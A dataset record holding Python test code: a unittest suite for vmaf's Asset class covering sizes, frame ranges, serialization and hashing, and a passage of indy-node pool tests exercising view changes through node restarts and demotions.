| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
45a1e284cbdff669adafe833488267a543e5099e
| 22,289
|
py
|
Python
|
python/test/asset_test.py
|
lunlun1992/vmaf
|
efb80822c6a7d8431928404be68a32a1f1574311
|
[
"Apache-2.0"
] | null | null | null |
python/test/asset_test.py
|
lunlun1992/vmaf
|
efb80822c6a7d8431928404be68a32a1f1574311
|
[
"Apache-2.0"
] | null | null | null |
python/test/asset_test.py
|
lunlun1992/vmaf
|
efb80822c6a7d8431928404be68a32a1f1574311
|
[
"Apache-2.0"
] | null | null | null |
__copyright__ = "Copyright 2016, Netflix, Inc."
__license__ = "Apache, Version 2.0"
import unittest
import re
import config
from core.asset import Asset
class AssetTest(unittest.TestCase):
    """Tests for core.asset.Asset.

    Covers: workdir generation, ref/dis/quality width-height resolution,
    start/end frame computation, duration and bitrate, serialization
    (str / repr / normalized dict), equality and hashing, workfile paths,
    yuv/resampling type options, and the crop/pad command options.

    Changes vs. the original: deprecated unittest aliases
    (assertEquals/assertAlmostEquals) replaced by assertEqual/
    assertAlmostEqual, Python-2-only ``print x`` statements replaced by
    ``print(x)`` calls (valid on both Python 2 and 3), and a redundant
    function-local ``import re`` removed (re is imported at module level).
    """

    def test_workdir(self):
        """A fresh Asset gets a unique subdirectory under workdir_root."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={}, workdir_root="my_workdir_root")
        workdir = asset.workdir
        self.assertTrue(re.match(r"^my_workdir_root/[a-zA-Z0-9-]+$", workdir))

    def test_ref_width_height(self):
        """ref_width/ref_height take precedence; width/height are the fallback."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'ref_width': 1920, 'ref_height': 1080})
        self.assertEqual(asset.ref_width_height, (1920, 1080))
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'ref_width': 1920, 'ref_height': 1080,
                                  'width': 720, 'height': 480})
        self.assertEqual(asset.ref_width_height, (1920, 1080))
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'width': 720, 'height': 480})
        self.assertEqual(asset.ref_width_height, (720, 480))

    def test_dis_width_height(self):
        """dis_width/dis_height take precedence; width/height are the fallback."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'dis_width': 1920, 'dis_height': 1080})
        self.assertEqual(asset.dis_width_height, (1920, 1080))
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'dis_width': 1920, 'dis_height': 1080,
                                  'width': 720, 'height': 480})
        self.assertEqual(asset.dis_width_height, (1920, 1080))
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'width': 720, 'height': 480})
        self.assertEqual(asset.dis_width_height, (720, 480))

    def test_quality_width_height(self):
        """Quality size must be explicit when ref and dis sizes differ."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={"ref_width": 1920, "ref_height": 1080,
                                  "dis_width": 720, "dis_height": 480})
        # Ambiguous: ref and dis differ and no quality size is given.
        with self.assertRaises(AssertionError):
            print(asset.quality_width_height)
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={"ref_width": 1920, "ref_height": 1080,
                                  "dis_width": 720, "dis_height": 480,
                                  "quality_width": 1280, "quality_height": 720})
        self.assertEqual(asset.quality_width_height, (1280, 720))
        # When ref and dis agree, the quality size defaults to that size.
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={"ref_width": 720, "ref_height": 480,
                                  "dis_width": 720, "dis_height": 480})
        self.assertEqual(asset.quality_width_height, (720, 480))
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={"width": 720, "height": 480})
        self.assertEqual(asset.quality_width_height, (720, 480))

    def test_start_end_frame(self):
        """Frame ranges from explicit frames, shared frames, fps+duration, or fps+seconds."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'ref_start_frame': 2, 'ref_end_frame': 2,
                                  'dis_start_frame': 3, 'dis_end_frame': 3})
        self.assertEqual(asset.ref_start_end_frame, (2, 2))
        self.assertEqual(asset.dis_start_end_frame, (3, 3))
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'start_frame': 2, 'end_frame': 2})
        self.assertEqual(asset.ref_start_end_frame, (2, 2))
        self.assertEqual(asset.dis_start_end_frame, (2, 2))
        # fps * duration_sec = 48 frames -> inclusive range (0, 47)
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'fps': 24, 'duration_sec': 2})
        self.assertEqual(asset.ref_start_end_frame, (0, 47))
        self.assertEqual(asset.dis_start_end_frame, (0, 47))
        # start/end seconds scaled by fps -> inclusive range (48, 71)
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'fps': 24, 'start_sec': 2, 'end_sec': 3})
        self.assertEqual(asset.ref_start_end_frame, (48, 71))
        self.assertEqual(asset.dis_start_end_frame, (48, 71))

    def test_duration_sec(self):
        """Duration is derivable only when fps is known."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'ref_start_frame': 2, 'ref_end_frame': 2,
                                  'dis_start_frame': 3, 'dis_end_frame': 3})
        self.assertEqual(asset.ref_duration_sec, None)
        self.assertEqual(asset.dis_duration_sec, None)
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'ref_start_frame': 0, 'ref_end_frame': 23,
                                  'dis_start_frame': 3, 'dis_end_frame': 26,
                                  'fps': 24})
        self.assertEqual(asset.ref_duration_sec, 1.0)
        self.assertEqual(asset.dis_duration_sec, 1.0)

    def test_bitrate(self):
        """Bitrate is computed from file size, frame range and fps."""
        ref_path = config.ROOT + "/resource/yuv/src01_hrc00_576x324.yuv"
        dis_path = config.ROOT + "/resource/yuv/src01_hrc01_576x324.yuv"
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path=ref_path, dis_path=dis_path,
                      asset_dict={'ref_start_frame': 0, 'ref_end_frame': 47,
                                  'dis_start_frame': 0, 'dis_end_frame': 47,
                                  'fps': 23.976})
        self.assertAlmostEqual(asset.ref_bitrate_kbps_for_entire_file,
                               53693.964287999996, places=4)
        self.assertAlmostEqual(asset.dis_bitrate_kbps_for_entire_file,
                               53693.964287999996, places=4)

    def test_to_normalized_dict(self):
        """Normalized dict strips directory components and blanks the workdir."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'start_frame': 2, 'end_frame': 2})
        self.assertEqual(
            asset.to_normalized_dict(),
            {'asset_dict': {'end_frame': 2, 'height': 480,
                            'start_frame': 2, 'width': 720},
             'asset_id': 0,
             'content_id': 0,
             'dataset': 'test',
             'dis_path': 'disvideo.yuv',
             'ref_path': 'refvideo.yuv',
             'workdir': ''
             }
        )

    def test_to_normalized_dict_10le(self):
        """Compound extensions like .yuv420p10le.yuv survive normalization."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="dir/refvideo.yuv420p10le.yuv",
                      dis_path="dir/disvideo.yuv420p10le.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'start_frame': 2, 'end_frame': 2})
        self.assertEqual(
            asset.to_normalized_dict(),
            {'asset_dict': {'end_frame': 2, 'height': 480,
                            'start_frame': 2, 'width': 720},
             'asset_id': 0,
             'content_id': 0,
             'dataset': 'test',
             'dis_path': 'disvideo.yuv420p10le.yuv',
             'ref_path': 'refvideo.yuv420p10le.yuv',
             'workdir': ''
             }
        )

    def test_str_repr(self):
        """str() is a human-readable tag; repr() round-trips via from_repr()."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'start_frame': 2, 'end_frame': 2})
        self.assertEqual(
            str(asset),
            "test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_720x480"
        )
        expected_repr = '{"asset_dict": {"end_frame": 2, "height": 480, "start_frame": 2, "width": 720}, "asset_id": 0, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
        self.assertEqual(repr(asset), expected_repr)
        recon_asset = Asset.from_repr(expected_repr)
        self.assertEqual(asset, recon_asset)
        self.assertTrue(asset == recon_asset)
        self.assertFalse(asset != recon_asset)
        self.assertEqual(asset.to_normalized_repr(), expected_repr)

        asset = Asset(dataset="test", content_id=0, asset_id=1,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480})
        self.assertEqual(
            str(asset),
            "test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
        )
        expected_repr = '{"asset_dict": {"height": 480, "width": 720}, "asset_id": 1, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
        self.assertEqual(repr(asset), expected_repr)
        recon_asset = Asset.from_repr(expected_repr)
        self.assertEqual(asset, recon_asset)

        asset = Asset(dataset="test", content_id=0, asset_id=2,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 1920, 'quality_height': 1080})
        self.assertEqual(
            str(asset),
            "test_0_2_refvideo_720x480_vs_disvideo_720x480_q_1920x1080"
        )
        expected_repr = '{"asset_dict": {"height": 480, "quality_height": 1080, "quality_width": 1920, "width": 720}, "asset_id": 2, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
        self.assertEqual(repr(asset), expected_repr)
        recon_asset = Asset.from_repr(expected_repr)
        self.assertEqual(asset, recon_asset)

        # yuv_type participates in str() only when it is non-default.
        asset = Asset(dataset="test", content_id=0, asset_id=2,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 1920, 'quality_height': 1080,
                                  'yuv_type': 'yuv422p'})
        self.assertEqual(
            str(asset),
            "test_0_2_refvideo_720x480_yuv422p_vs_disvideo_720x480_yuv422p_q_1920x1080"
        )
        expected_repr = '{"asset_dict": {"height": 480, "quality_height": 1080, "quality_width": 1920, "width": 720, "yuv_type": "yuv422p"}, "asset_id": 2, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
        self.assertEqual(repr(asset), expected_repr)
        recon_asset = Asset.from_repr(expected_repr)
        self.assertEqual(asset, recon_asset)

        # resampling_type shows in str() when scaling actually occurs.
        asset = Asset(dataset="test", content_id=0, asset_id=2,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 1920, 'quality_height': 1080,
                                  'resampling_type': 'lanczos'})
        self.assertEqual(
            str(asset),
            "test_0_2_refvideo_720x480_vs_disvideo_720x480_q_1920x1080_lanczos"
        )
        expected_repr = '{"asset_dict": {"height": 480, "quality_height": 1080, "quality_width": 1920, "resampling_type": "lanczos", "width": 720}, "asset_id": 2, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
        self.assertEqual(repr(asset), expected_repr)
        recon_asset = Asset.from_repr(expected_repr)
        self.assertEqual(asset, recon_asset)

    def test_str(self):
        """Resampling type appears in str() only when ref or dis is scaled."""
        asset = Asset(dataset="test", content_id=0, asset_id=1,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 720, 'quality_height': 480})
        self.assertEqual(
            str(asset),
            "test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
        )
        asset = Asset(dataset="test", content_id=0, asset_id=1,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'resampling_type': 'lanczos'})
        self.assertEqual(
            str(asset),
            "test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
        )
        asset = Asset(dataset="test", content_id=0, asset_id=1,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 720, 'quality_height': 480,
                                  'resampling_type': 'lanczos'})
        self.assertEqual(
            str(asset),
            "test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
        )
        asset = Asset(dataset="test", content_id=0, asset_id=1,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'ref_width': 720, 'ref_height': 480,
                                  'dis_width': 1920, 'dis_height': 1080,
                                  'quality_width': 720, 'quality_height': 480,
                                  'resampling_type': 'lanczos'})
        self.assertEqual(
            str(asset),
            "test_0_1_refvideo_720x480_vs_disvideo_1920x1080_q_720x480_lanczos"
        )
        asset = Asset(dataset="test", content_id=0, asset_id=1,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'ref_width': 1920, 'ref_height': 1080,
                                  'dis_width': 720, 'dis_height': 480,
                                  'quality_width': 720, 'quality_height': 480,
                                  'resampling_type': 'lanczos'})
        self.assertEqual(
            str(asset),
            "test_0_1_refvideo_1920x1080_vs_disvideo_720x480_q_720x480_lanczos"
        )

    def test_hash_equal(self):
        """Equality/hash use normalized content (basenames), not full paths."""
        asset1 = Asset(dataset="test", content_id=0, asset_id=2,
                       ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                       asset_dict={'width': 720, 'height': 480,
                                   'quality_width': 1920, 'quality_height': 1080})
        asset2 = Asset(dataset="test", content_id=0, asset_id=2,
                       ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                       asset_dict={'width': 720, 'height': 480,
                                   'quality_width': 1920, 'quality_height': 1080})
        asset3 = Asset(dataset="test", content_id=0, asset_id=2,
                       ref_path="my/dir/refvideo.yuv", dis_path="my/dir/disvideo.yuv",
                       asset_dict={'width': 720, 'height': 480,
                                   'quality_width': 1920, 'quality_height': 1080})
        asset4 = Asset(dataset="test", content_id=0, asset_id=2,
                       ref_path="my/dir/refvideo.yuv", dis_path="my/dir/disvideo.avi",
                       asset_dict={'width': 720, 'height': 480,
                                   'quality_width': 1920, 'quality_height': 1080})
        self.assertTrue(asset1 == asset2)
        self.assertTrue(asset2 == asset3)   # directory differs, basename matches
        self.assertFalse(asset3 == asset4)  # basename differs
        self.assertTrue(hash(asset2) == hash(asset3))
        self.assertFalse(hash(asset1) == hash(asset4))

    def test_workfile_path(self):
        """Workfile paths live under the workdir and embed the asset tag."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'start_frame': 2, 'end_frame': 2,
                                  'quality_width': 1920, 'quality_height': 1080},
                      workdir_root="workdir")
        expected_ref_workfile_path_re = \
            r"^workdir/[a-zA-Z0-9-]+/" \
            r"ref_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
        expected_dis_workfile_path_re = \
            r"^workdir/[a-zA-Z0-9-]+/" \
            r"dis_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
        self.assertTrue(re.match(expected_ref_workfile_path_re, asset.ref_workfile_path))
        self.assertTrue(re.match(expected_dis_workfile_path_re, asset.dis_workfile_path))

    def test_yuv_type(self):
        """yuv_type defaults to yuv420p and rejects unknown formats."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'fps': 24, 'start_sec': 2, 'end_sec': 3})
        self.assertEqual(asset.yuv_type, 'yuv420p')
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="", asset_dict={
                          'fps': 24, 'start_sec': 2, 'end_sec': 3, 'yuv_type': 'yuv444p'})
        self.assertEqual(asset.yuv_type, 'yuv444p')
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="", asset_dict={
                          'fps': 24, 'start_sec': 2, 'end_sec': 3, 'yuv_type': 'yuv444a'})
        with self.assertRaises(AssertionError):
            print(asset.yuv_type)

    def test_resampling_type(self):
        """resampling_type defaults to bilinear and honors overrides."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'fps': 24, 'start_sec': 2, 'end_sec': 3})
        self.assertEqual(asset.resampling_type, 'bilinear')
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'fps': 24, 'start_sec': 2, 'end_sec': 3,
                                  'resampling_type': 'lanczos'})
        self.assertEqual(asset.resampling_type, 'lanczos')
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'fps': 24, 'start_sec': 2, 'end_sec': 3,
                                  'resampling_type': 'bicubic'})
        self.assertEqual(asset.resampling_type, 'bicubic')

    def test_use_path_as_workpath(self):
        """Setting use_path_as_workpath makes workfile paths alias the inputs."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
                      asset_dict={'width': 720, 'height': 480,
                                  'start_frame': 2, 'end_frame': 2,
                                  'quality_width': 1920, 'quality_height': 1080},
                      workdir_root="workdir")
        expected_ref_workfile_path_re = \
            r"^workdir/[a-zA-Z0-9-]+/" \
            r"ref_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
        expected_dis_workfile_path_re = \
            r"^workdir/[a-zA-Z0-9-]+/" \
            r"dis_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
        self.assertTrue(re.match(expected_ref_workfile_path_re, asset.ref_workfile_path))
        self.assertTrue(re.match(expected_dis_workfile_path_re, asset.dis_workfile_path))
        self.assertFalse('use_path_as_workpath' in asset.asset_dict)
        asset.use_path_as_workpath = True
        # The flag is persisted in asset_dict so it survives serialization.
        self.assertTrue('use_path_as_workpath' in asset.asset_dict)
        self.assertTrue(asset.asset_dict['use_path_as_workpath'])
        self.assertEqual(asset.ref_workfile_path, 'dir/refvideo.yuv')
        self.assertEqual(asset.dis_workfile_path, 'dir/disvideo.yuv')

    def test_crop_cmd(self):
        """crop_cmd is optional; when present it is appended to str()."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 720, 'quality_height': 320,
                                  'yuv_type': 'yuv422p',
                                  'crop_cmd': '570:320:3:2'})
        self.assertEqual(asset.crop_cmd, '570:320:3:2')
        self.assertEqual(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320_crop570:320:3:2")
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 720, 'quality_height': 320,
                                  'yuv_type': 'yuv422p'})
        self.assertTrue(asset.crop_cmd is None)
        self.assertEqual(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320")

    def test_pad_cmd(self):
        """pad_cmd is optional; when present it is appended to str()."""
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 720, 'quality_height': 320,
                                  'yuv_type': 'yuv422p',
                                  'pad_cmd': 'iw+6:ih+4:3:2'})
        self.assertEqual(asset.pad_cmd, 'iw+6:ih+4:3:2')
        self.assertEqual(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320_padiw+6:ih+4:3:2")
        asset = Asset(dataset="test", content_id=0, asset_id=0,
                      ref_path="", dis_path="",
                      asset_dict={'width': 720, 'height': 480,
                                  'quality_width': 720, 'quality_height': 320,
                                  'yuv_type': 'yuv422p'})
        self.assertTrue(asset.pad_cmd is None)
        self.assertEqual(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320")
# Entry point: run all AssetTest cases when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 51.475751
| 270
| 0.557001
| 2,601
| 22,289
| 4.445598
| 0.053057
| 0.023091
| 0.045836
| 0.091499
| 0.878405
| 0.850904
| 0.815619
| 0.807057
| 0.792182
| 0.776442
| 0
| 0.085294
| 0.307775
| 22,289
| 432
| 271
| 51.594907
| 0.664139
| 0
| 0
| 0.633245
| 0
| 0.013193
| 0.247701
| 0.064965
| 0
| 0
| 0
| 0
| 0.205805
| 0
| null | null | 0
| 0.013193
| null | null | 0.005277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45e096d91306b60a6d9a456cf52fab516f7431be
| 6,922
|
py
|
Python
|
system/indy-node-tests/test_vc.py
|
devinleighsmith/indy-test-automation
|
32d27c8cf8e233d5e365672358752ae3a8b5bf00
|
[
"Apache-2.0"
] | 7
|
2019-03-14T10:52:50.000Z
|
2021-12-03T00:02:15.000Z
|
system/indy-node-tests/test_vc.py
|
devinleighsmith/indy-test-automation
|
32d27c8cf8e233d5e365672358752ae3a8b5bf00
|
[
"Apache-2.0"
] | 27
|
2018-10-24T15:28:32.000Z
|
2022-03-29T21:30:35.000Z
|
system/indy-node-tests/test_vc.py
|
devinleighsmith/indy-test-automation
|
32d27c8cf8e233d5e365672358752ae3a8b5bf00
|
[
"Apache-2.0"
] | 22
|
2018-10-03T17:05:23.000Z
|
2021-12-03T00:02:04.000Z
|
import pytest
import logging
import asyncio
from async_generator import async_generator, yield_

from system.utils import *

# Module-level logger; handler/level configuration is left to the test
# runner. (The duplicate `import logging` and the commented-out duplicate
# logger/basicConfig lines from the original have been removed.)
logger = logging.getLogger(__name__)
# Autouse per-test fixture: the actual Docker pool setup/teardown is done by
# the wrapped docker_setup_and_teardown_function fixture; this wrapper only
# marks where the test body executes.
@pytest.fixture(scope='function', autouse=True)
@async_generator
async def docker_setup_and_teardown(docker_setup_and_teardown_function):
    # yield_() (async_generator backport) suspends here while the test runs.
    await yield_()
@pytest.mark.asyncio
async def test_vc_by_restart(
        pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
    """Stop the acting primary, verify a view change moves primaryship off it,
    then restart the node and check the pool re-syncs and still orders txns."""
    trustee_did, _ = get_default_trustee
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)

    # Locate the current primary and take its service down.
    old_primary, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
    primary_host = NodeHost(old_primary)
    primary_host.stop_service()

    # The pool must elect a different primary and keep ordering.
    await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, old_primary)
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)

    # Bring the stopped node back and confirm it catches up.
    primary_host.start_service()
    await ensure_pool_is_in_sync(nodes_num=nodes_num)
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
# Skipped: blocked by known issue INDY-2023.
@pytest.mark.skip('INDY-2023')
@pytest.mark.asyncio
async def test_vc_by_demotion_primary(
        pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
    """Demote the acting primary, then promote it back; each ledger change
    should trigger a view change and the pool must keep ordering txns."""
    trustee_did, _ = get_default_trustee
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
    primary_before, primary_alias, primary_did = await get_primary(pool_handler, wallet_handler, trustee_did)
    # eventually() retries the demotion write — presumably until the NODE txn
    # is accepted; confirm against system.utils.
    await eventually(demote_node, pool_handler, wallet_handler, trustee_did, primary_alias, primary_did)
    await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, primary_before)
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
    primary_next, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
    # Promote the node back; this should force yet another view change.
    await eventually(promote_node, pool_handler, wallet_handler, trustee_did, primary_alias, primary_did)
    await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, primary_next)
    await ensure_pool_is_in_sync(nodes_num=nodes_num)
    # Longer timeout: the promoted node has just rejoined consensus.
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=360)
@pytest.mark.asyncio
async def test_vc_by_demotion_last(
        pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
    """Demote Node7, wait for the resulting view change, promote it back and
    wait for another; the pool must stay in sync and keep ordering txns."""
    node7_alias = 'Node7'
    node7_did = 'BM8dTooz5uykCbYSAAFwKNkYfT4koomBHsSWHTDtkjhW'
    trustee_did, _ = get_default_trustee
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)

    # Demote Node7 and verify a view change elects a new primary.
    initial_primary, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
    await eventually(demote_node, pool_handler, wallet_handler, trustee_did, node7_alias, node7_did)
    await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, initial_primary)
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)

    # Promote Node7 back and verify yet another view change happens.
    interim_primary, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
    await eventually(promote_node, pool_handler, wallet_handler, trustee_did, node7_alias, node7_did)
    await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, interim_primary)

    await ensure_pool_is_in_sync(nodes_num=nodes_num)
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=360)
# Needs an 8-node pool so that three replicas exist (scenario assumes the
# replica primaries are Node1, Node2 and Node3 — see step 1 log below).
@pytest.mark.nodes_num(8)
@pytest.mark.asyncio
async def test_demotion_of_backup_primary_with_restart_with_vc(
        pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
    """Demote the backup (replica-2) primary, let the view change complete,
    then restart the whole pool and verify it is in sync and functional."""
    R0_PRIMARY_ID = 1
    R1_PRIMARY_ID = 2  # NOTE(review): unused here; kept parallel to the "without_vc" variant
    R2_PRIMARY_ID = 3
    hosts = [NodeHost(node_id + 1) for node_id in range(nodes_num)]
    trustee_did, _ = get_default_trustee
    logger.info("1 Have 8 nodes in the pool, so that primaries are [Node1, Node2, Node3]")
    await check_pool_is_functional(pool_handler, wallet_handler, trustee_did)
    # Pool info is read from Node1 (the master-replica primary).
    pool_info = get_pool_info(str(R0_PRIMARY_ID))
    logger.info("2 Demote primary for replica 2")
    primary_r2_alias = get_node_alias(R2_PRIMARY_ID)
    primary_r2_did = get_node_did(primary_r2_alias, pool_info=pool_info)
    # eventually() retries the demotion — presumably until the NODE txn is
    # written; confirm against system.utils.
    await eventually(
        demote_node, pool_handler, wallet_handler, trustee_did, primary_r2_alias, primary_r2_did
    )
    logger.info("3 Wait for view change")
    # TODO timeouts
    logger.info('Primary before: {}'.format(R0_PRIMARY_ID))
    primary_after = await ensure_primary_changed(
        pool_handler, wallet_handler, trustee_did, str(R0_PRIMARY_ID)
    )
    logger.info('Primary after: {}'.format(primary_after))
    logger.info("4 Order 1 more txn")
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
    logger.info("5 Restart the whole pool")
    restart_pool(hosts)
    logger.info("6 Make sure that the pool restarted correctly, and can order txns")
    logger.info("6.1 ensure that pool is in sync")
    # TODO timeouts
    # The demoted node (Node3) is excluded from the sync check.
    await ensure_pool_is_in_sync(node_ids=[h.id for h in hosts if h.id != R2_PRIMARY_ID])
    logger.info("6.2 ensure that pool orders requests")
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=60)
# Needs an 8-node pool so that three replicas exist (scenario assumes the
# replica primaries are Node1, Node2 and Node3 — see step 1 log below).
@pytest.mark.nodes_num(8)
@pytest.mark.asyncio
async def test_demotion_of_backup_primary_with_restart_without_vc(
        pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
    """Demote the backup (replica-2) primary while the next primary (Node2)
    is down — so the triggered view change cannot complete — then restart
    the whole pool and verify it recovers, syncs, and orders txns."""
    R0_PRIMARY_ID = 1
    R1_PRIMARY_ID = 2
    R2_PRIMARY_ID = 3
    hosts = [NodeHost(node_id + 1) for node_id in range(nodes_num)]
    trustee_did, _ = get_default_trustee
    logger.info("1 Have 8 nodes in the pool, so that primaries are [Node1, Node2, Node3]")
    await check_pool_is_functional(pool_handler, wallet_handler, trustee_did)
    logger.info("2 Stop Node2 to delay the view change to viewNo=1")
    # Pool info is read from Node1 (the master-replica primary).
    pool_info = get_pool_info(str(R0_PRIMARY_ID))
    host2 = hosts[R1_PRIMARY_ID - 1]
    host2.stop_service()
    logger.info("3 Demote Node3: it will trigger a view change to viewNo=1")
    # which in turn will trigger a view change timeout since Node2 (the next primary) has been stopped
